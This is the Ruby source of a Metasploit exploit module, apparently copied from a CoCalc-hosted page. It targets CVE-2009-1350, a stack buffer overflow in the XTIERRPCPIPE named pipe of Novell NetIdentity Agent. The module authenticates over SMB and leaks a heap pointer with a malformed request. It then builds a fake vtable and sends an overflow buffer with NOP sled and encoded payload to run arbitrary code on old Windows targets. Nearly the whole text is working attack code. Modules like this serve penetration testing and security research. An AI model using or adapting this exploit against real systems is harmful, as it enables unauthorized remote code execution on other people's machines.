CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SMB::Client
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
16
        a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
17
        able to execute arbitrary code. The success of this module is much greater once the
18
        service has been restarted.
19
      },
20
      'Author'         => [ 'MC', 'Ruben Santamarta' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2009-1350' ],
25
          [ 'OSVDB', '53351' ],
26
          [ 'BID', '34400' ],
27
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
28
        ],
29
      'DefaultOptions' =>
30
        {
31
          'EXITFUNC' => 'process', # only one shot!
32
        },
33
      'Payload'	=>
34
        {
35
          'Space'	=> 550,
36
          'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
37
          'StackAdjustment' => -3500,
38
          'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
39
        },
40
      'Platform'	=> 'win',
41
      'Targets'	=>
42
        [
43
          [ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
44
        ],
45
      'Privileged'	 => true,
46
      'DisclosureDate' => '2009-04-06',
47
      'DefaultTarget'	 => 0))
48

49
    register_options(
50
      [
51
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),
52
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])
53
      ])
54

55
    deregister_options('SMB::ProtocolVersion')
56
  end
57

58
  # don't bother with this module for autoexploitation, it creates
59
  # false-positives on newer systems.
60
  def autofilter
61
    false
62
  end
63

64
  def mem_leak
65
    print_status("Connecting to the server...")
66
    connect(versions: [1])
67

68
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
69

70
    begin
71
      smb_login()
72
    rescue ::Exception => e
73
      print_error("Error: #{e}")
74
      disconnect
75
      return
76
    end
77

78
    print_status("Connecting to named pipe \\XTIERRPCPIPE...")
79

80
    # If the pipe doesn't exist, bail.
81
    begin
82
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
83
    rescue ::Exception => e
84
      print_error("Error: #{e}")
85
      disconnect
86
      return
87
    end
88

89
    # If we get this far, do the dance.
90
    fid = pipe.file_id
91

92
    # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
93
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
94

95
    # Send the first request to get our pointer.
96
    leak =  [0x00000004].pack('V') + [0x00000818].pack('V')
97
    leak << rand_text_alpha_upper(2040)
98

99
    print_status("Sending malformed request...")
100
    pipe.write(leak)
101

102
    heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]
103
    print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))
104

105
    print_status("Building fake VTable...")
106
    object = heap_pointer_leaked + 0x700
107
    print_status(sprintf("Object: 0x%.8x", object))
108
    method = object + 0x30
109
    print_status(sprintf("Method: 0x%.8x", method))
110
    shellcode = method + 0xA0
111
    print_status(sprintf("Shellcode: 0x%.8x", shellcode))
112

113
    pipe.close
114

115
    return heap_pointer_leaked,object,method,shellcode
116
  end
117

118
  def exploit
119
    heap_pointer_leaked,object,method,shellcode = mem_leak()
120

121
    return if not shellcode
122

123
    sploit =  [0x00000002].pack('V')
124
    sploit << [0x00000000].pack('V')
125
    sploit << [object].pack('V')
126
    sploit << [0x00000000].pack('V')
127
    sploit << rand_text_alpha_upper(240)
128
    sploit << [object].pack('V') * 32
129
    sploit << [method].pack('V') * 32
130
    sploit << [shellcode].pack('V') * 32
131
    sploit << make_nops(748)
132
    sploit << payload.encoded
133
    sploit << rand_text_alpha_upper(110)
134

135
    print_status("Connecting to the server...")
136
    connect(versions: [1])
137

138
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
139

140
    begin
141
      smb_login()
142
    rescue ::Exception => e
143
      print_error("Error: #{e}")
144
      disconnect
145
      return
146
    end
147

148
    print_status("Connecting to named pipe \\XTIERRPCPIPE...")
149

150
    # If the pipe doesn't exist, bail.
151
    begin
152
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
153
    rescue ::Exception => e
154
      print_error("Error: #{e}")
155
      disconnect
156
      return
157
    end
158

159
    # ok, set up and send our exploit buffer...
160
    fid = pipe.file_id
161
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
162
    print_status("#{sploit.length} bytes written...")
163
    pipe.write(sploit)
164

165
    handler
166
    disconnect
167
  end
168
end
169

170